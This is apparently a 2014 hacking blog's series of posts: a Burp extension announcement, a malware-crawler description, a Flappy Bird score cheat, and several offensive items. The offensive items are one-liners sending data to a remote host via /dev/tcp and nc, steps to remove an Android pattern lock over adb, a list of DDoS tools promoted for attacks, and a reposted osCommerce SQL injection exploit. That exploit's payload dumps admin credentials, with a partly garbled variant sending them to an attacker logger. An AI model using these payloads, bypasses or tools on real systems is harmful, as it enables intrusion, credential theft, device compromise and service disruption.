Feb 13, 2014

Tools: Burp CO2 - collection of Burp extensions

his is for those of you who do web pen testing with Portswigger's Burp proxy tool!  Over the past couple of months I have been using my Java skills and "free time" (lol) to build a collection of Burp extensions that have been dubbed "Co2".
Included in this version are a few useful modules.  The first is called SQLMapper, a sqlmap helper.  Simply right-click on any request in Burp and you will see a new menu option to send the request to SQLMapper.  The following screen will appear pre-populated with the URL, POST data (if applicable) and Cookies (if applicable) from the request.  You can then set any other options you need and then copy/paste the SQLMap Command to sqlmap on your command line.

Source: http://blog.secureideas.com/2014/02/announcing-burp-co2.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Sending stdout to another server without programming

cat test >/dev/tcp/$host/$port # if tcp
cat test >/dev/udp/$host/$port # if udp
cat test | nc $host $port      # if tcp
cat test | nc -u $host $port   # if udp 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 12, 2014

Howto: How to bypass android pattern Lock

1.Connect your phone to your PC using USB cable.

2.Installing ADB over terminal

3. Boot into any Linux distro you have.

4.Install ADB 
apt-get install android-tools-adb

5. Disabling pattern unlock over terminal
adb devices
adb shell
cd data/system
rm *.key

6. Reboot the phone, unlock pattern should be gone.Just try some random
gesture and it will unlock.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 10, 2014

Tools: Maltrieve A tool to retrieve malware directly from the source for security researchers.

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites, including:
•    Malc0de
•    Malware Black List
•    Malware Domain List
•    Malware Patrol
•    Sacour.cn
•    VX Vault
•    URLqery
•    CleanMX
These lists will be implemented if/when they return to activity.
•    NovCon Minotaur
Other improvements include:
•    Proxy support
•    Multithreading for improved performance
•    Logging of source URLs
•    Multiple user agent support
•    Better error handling
•    VxCage and Cuckoo Sandbox support

Source: https://github.com/technoskald/maltrieve 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

DoS List Tool

Denial of service (DOS) attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols.


Teardrop attack is type of attack where fragmented packets are forged to overlap each other when the receiving host tries to reassemble them.

Ping of death type of DoS attack in which the attacker sends a ping request that is larger than 65,536 bytes, which is the maximum size that IP allows. While a ping larger than 65,536 bytes is too large to fit in one packet that can be transmitted, TCP/IP allows a packet to be fragmented, essentially splitting the packet into smaller segments that are eventually reassembled. Attacks took advantage of this flaw by fragmenting packets that when received would total more than the allowed number of bytes and would effectively cause a buffer overload on the operating system at the receiving end, crashing the system. Ping of death attacks are rare today as most operating systems have been fixed to prevent this type of attack from occurring. 

DDOS Attack: A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. This is the result of multiple compromised systems (for example a botnet) flooding the targeted system(s) with traffic. When a server is overloaded with connections, new connections can no longer be accepted.

Peer to Peer Attack: Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a "puppet master," instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses.

For all known DOS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks.

Top 10 Dos Attack Tools:-

1. LOIC (Low Orbit Ion Canon)
This tool was used by the popular hackers group Anonymous. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.


2. HOIC:
High Orbit Ion Canon HOIC
HIgh Orbit Ion Canon HOIC is Anonymous DDOS Tool. HOIC is an Windows executable file

High-speed multi-threaded HTTP Flood

  • - Simultaenously flood up to 256 websites at once
  • - Built in scripting system to allow the deployment of 'boosters', scripts
  • designed to thwart DDoS counter measures and increase DoS output.
  • - Easy to use interface
  • - C an be ported over to Linux/Mac with a few bug fixes (I do not have
  • either systems so I do
  • - Ability to select the number of threads in an ongoing attack
  • - Ability to throttle attacks individually with three settings: LOW, MEDIUM,
  • and HIGH - 
XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol.

XOIC have 3 modes:

-Test Mode
-Normal DoS attack mode (No request counter and TCP HTTP UDP ICMP message because of performance )
-DoS attack with a TCP/HTTP/UDP/ICMP Message
4. Tor Hammer
Tor's Hammer is a slow post dos testing tool written in Python. It can also be run through the Tor network to be anonymized. If you are going to run it with Tor it assumes you are running Tor on Kills most unprotected web servers running Apache and IIS via a single instance. Kills Apache 1.X and older IIS with ~128 threads, newer IIS and Apache 2.X with ~256 threads.
5. Anonymous-DoS
Anonymous-DoS is a http flood program written in hta and javascript, designed
to be lightweight, portable, possible to be uploaded to websites whilst still
having a client version, and made for Anonymous ddos attacks.

How does it work?
It will flood a chosen web server with HTTP connections, with enough it will
crash the server, resulting in a denial of service.


It is a tool for committing distributed denial of service attacks using execution on other sites. Download

7.  PyLoris is a scriptable tool for testing a server's vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

8. Dereil 
Dereil is professional (DDoS) Tools with modern patterns for attack via tcp , udp and http protocols . In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Download
9. Moihack Port-Flooder
This is a simple Port Flooder written in Python 3.2 Use this tool to quickly stress test your network devices and measure your router's or server's load. Features are available in features section below. Moihack DoS Attack Tool was the name of the 1st version of the program. Moihack Port-Flooder is the Reloaded Version of the program with major code rewrite and changes.
10. DDOSIM DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. HTTP server). Download

Source: http://blog.hackersonlineclub.com/2013/11/dos-attack-types-and-tools.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

osCommerce v2.x SQL Injection Vulnerability

# Title: osCommerce v2.x SQL Injection Vulnerability
# Dork: Powered by osCommerce
# Author: Ahmed Aboul-Ela
# Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek
# Vendor : http://www.oscommerce.com
# Version: v2.3.3.4 (current latest release) and prior versions should be affected too
# References: http://www.secgeek.net/oscommerce-v2x-sql-injection-vulnerability

- Vulnerable Code snippet in "catalog/admin/geo_zones.php":

LINE 138: $rows = 0;
LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id,
a.geo_zone_id, a.last_modified,
a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . "
c on a.zone_country_id = c.countries_id
left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID']
. " order by association_id";
LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw,
LINE 141: $zones_query = tep_db_query($zones_query_raw);

As we can see at line 139 the GET zID parameter directly concatenated with the sql query
without any type of sanitization which leads directly to sql injection vulnerability

- Proof of Concept ( dump the admin username and password ):

http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select
1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --

- Exploitation & Attack Scenario:

an authenticated admin account is required to successfully exploit the vulnerability
but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack

Example to steal the administrator username & password and send it to php logger at
"http://evilsite.com/logger.php?log=[ADMIN USER:HASH]"

We can use hybrid attack technique ( SQL Injection + XSS ) :

http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select
2237465737422292e68746d6c28293c2f7363726970743e) from administrators --

- Mitigation:

The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now


Source: http://packetstormsecurity.com/files/125107/osCommerce-2.x-SQL-Injection.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 9, 2014

Howto: Cheat Flappy Bird On Android

1. Install Flappy Bird

2. Play it once.

3. Root your android

4. Install ES File Explorer

5. Close and End your current flappy bird

6. Open ES File Explorer

7. Go to "Tool" Tab ->  Turn on "Root Explorer"

8. Go to folder /data/data/com.dotgears.flappy and open it.

9. Open "shared_prefs" folder

10. Open "FlappyBird.xml" with ES Note Editor(or another you want.)

11. Set the <int name="score" value ="score you want" /> such as <int name="score" value ="999" />

12. Save it.

13. Now close your ES File Explorer and get your Flappy Bird


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.